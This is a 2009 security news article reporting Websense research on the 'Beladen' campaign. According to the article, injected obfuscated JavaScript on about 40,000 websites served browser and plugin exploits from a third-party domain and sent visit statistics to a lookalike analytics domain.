Malicious injected JavaScript code tries to exploit visitors

Jun 3, 2009 10:25 GMT  ·  By

Researchers from Internet security vendor Websense warn of a new wave of web attacks that has resulted in 40,000 websites being compromised. The new threat injects malicious obfuscated JavaScript code, which subsequently loads and attempts to execute numerous exploits from a third-party server.

According to the company, these attacks are different from the Gumblar and Martuz campaigns, which have aggressively hit the web recently. It is still unclear how all these websites are being compromised as a common point of entry has not been determined yet. This leaves researchers to speculate that compromised FTP credentials could be at fault, just like in the Gumblar attacks.

The injected JavaScript code is hidden through complex obfuscation techniques. "The malicious code injected in the Beladen attacks uses an obfuscation method that starts with the initialization of a long, obfuscated string parameter. This gets de-obfuscated and then executed by the browser. This kind of obfuscation can employ many levels of obfuscation - where obfuscated code leads to more obfuscated code, and so on," explains Elad Sharf, security researcher at Websense.

The threat is named after the domain name from which the actual malicious payload, in the form of exploits, is being executed: beladen.net. Beladen is the German word for "loaded" and as Stephan Chenette, a senior security researcher at Websense, thinks, "That's appropriate because these hacked sites are absolutely loaded with almost every single exploit you can find publicly available right now."

As a result, users visiting the compromised websites will be served with a flurry of exploits for vulnerabilities in all sorts of software installed on their computer, ranging from browsers such as Firefox and Internet Explorer, to Adobe Reader, Flash Player, QuickTime and WinZIP. Since there is strong evidence that a big percentage of computer users fail to properly keep their software up to date, this attack can score a very high success rate.

According to The Register, most compromised websites observed by Websense belong to small companies or government institutions, which unfortunately did not generally respond to notifications sent by researchers.

In addition to launching exploits, the injected JavaScript code is also used to gather statistics from the visitors. Parts of the code are used to extract the name of the compromised website on which the user has landed, as well as the date and time of the visit, and send this info to a script on google-analyt1cs.net. This domain name has previously been associated with the Russian Business Network (RBN), an infamous cybercriminal organized group, which might be making a comeback.